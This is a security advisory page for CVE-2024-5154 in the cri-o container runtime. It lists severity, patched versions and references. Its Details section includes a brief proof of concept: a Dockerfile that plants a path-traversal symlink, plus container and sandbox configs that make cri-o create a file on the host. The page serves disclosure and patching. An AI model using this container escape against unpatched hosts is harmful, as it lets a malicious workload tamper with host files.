GHSA-j9hf-98c3-wrm8
Suggest an improvement- Source
- https://github.com/advisories/GHSA-j9hf-98c3-wrm8
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-j9hf-98c3-wrm8/GHSA-j9hf-98c3-wrm8.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-j9hf-98c3-wrm8
- Aliases
-
- CVE-2024-5154
- GO-2024-2919
- Published
- 2024-06-04T18:12:31Z
- Modified
- 2024-12-11T06:30:24Z
- Severity
-
- 8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N CVSS Calculator
- Summary
- malicious container creates symlink "mtab" on the host External
- Details
-
Impact
A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.
A workload built from this Dockerfile:
FROM docker.io/library/busybox as source RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc FROM scratch COPY --from=source /bin /bin COPY --from=source /lib /lib COPY --from=source /extra .and this container config:
{ "metadata": { "name": "busybox" }, "image":{ "image": "localhost/test" }, "command": [ "/bin/true" ], "linux": { } }and this sandbox config
{ "metadata": { "name": "test-sandbox", "namespace": "default", "attempt": 1, "uid": "edishd83djaideaduwk28bcsb" }, "linux": { "security_context": { "namespace_options": { "network": 2 } } } }will create a file on host
/host/mtabPatches
1.30.1, 1.29.5, 1.28.7
Workarounds
Unfortunately not
References
Are there any links users can visit to find out more?
- Database specific
{ "nvd_published_at": "2024-06-12T09:15:19Z", "cwe_ids": [ "CWE-22", "CWE-668" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-06-04T18:12:31Z" }- References
-
- https://github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm8
- https://nvd.nist.gov/vuln/detail/CVE-2024-5154
- https://access.redhat.com/errata/RHSA-2024:10818
- https://access.redhat.com/errata/RHSA-2024:3676
- https://access.redhat.com/errata/RHSA-2024:3700
- https://access.redhat.com/errata/RHSA-2024:4008
- https://access.redhat.com/errata/RHSA-2024:4486
- https://access.redhat.com/security/cve/CVE-2024-5154
- https://bugzilla.redhat.com/show_bug.cgi?id=2280190
- https://github.com/cri-o/cri-o
- https://pkg.go.dev/vuln/GO-2024-2919
Affected packages
Go / github.com/cri-o/cri-o
Package
- Name
- github.com/cri-o/cri-o
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/cri-o/cri-o
Go / github.com/cri-o/cri-o
Package
- Name
- github.com/cri-o/cri-o
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/cri-o/cri-o
Go / github.com/cri-o/cri-o
Package
- Name
- github.com/cri-o/cri-o
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/cri-o/cri-o